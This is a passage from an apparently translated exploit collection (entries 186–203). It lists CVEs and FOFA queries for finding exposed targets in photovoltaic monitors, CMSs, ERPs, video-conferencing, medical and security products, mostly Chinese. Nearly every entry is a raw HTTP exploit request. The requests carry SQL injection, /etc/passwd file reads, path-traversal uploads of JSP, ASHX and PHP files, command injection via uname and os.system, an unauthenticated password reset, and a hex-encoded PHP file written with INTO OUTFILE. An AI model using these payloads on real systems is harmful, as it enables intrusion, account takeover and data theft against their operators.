GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload interface file upload

1. Run the PoC to fetch the CSRF value, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the request below:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
